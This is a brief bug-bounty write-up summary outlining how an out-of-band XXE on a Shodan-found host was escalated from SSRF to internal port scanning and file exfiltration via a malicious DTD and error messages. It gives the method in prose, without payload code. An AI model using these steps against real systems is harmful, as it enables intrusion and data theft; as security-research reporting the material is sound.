f46b5405
20230315 - Exploiting Out-of-Band XXE in the Wild from P4 to P1.md
Exploiting Out-of-Band XXE in the Wild from P4 to P1 π
Phase 1 --> Recon π§
- Collected list of IP from shodan
- Made full port scan with rustscan
- Came across IP with port 9180use some XML content
- I decided to test XXE
Phase 2 --> Analysis π§©
- I tried to retrieve local files, but i got nothing
- I used XXE payloads and started to compare with the responses differences, but I got nothing again.
Phase 3 --> SSRF (P4) π³
- I tried to perform an HTTP request to my burp collab.
- So I tried several payloads until finally one of them worked.
- Bingoooooo! now I have P4 submission.
Phase 4 --> Port Scan (P3) π
- I thought what about escalating it to P3 with a simple port scanning?
- So I sent a simple request to 9180 and another to 1234 and compare the two responses
- So I made a simple port scan for top 10000 ports, and I got some open ports :)
Phase 5 --> Limited OOB XXE (P2) π
- I thought itβs time to test Out-of-band XXE (picture)
- So we need a malicious DTD file that requests local files
- Our malicious DTD requests /etc/hostname file and send it to my IP on 1337 port
- And guess what?I got the result.
Phase 6 --> final XXE (P1) π
- I made the OOB XXE exploitation successfully!! But actually, I couldnβt get any file with multiple lines
- I tried several techniques such as base64, FTP, ... but i failed in all of them.
- Finally I was able to do this with error messages
Credit
Based on Mahmoud Youssef's writeup.
Support
You can Follow me on twitter or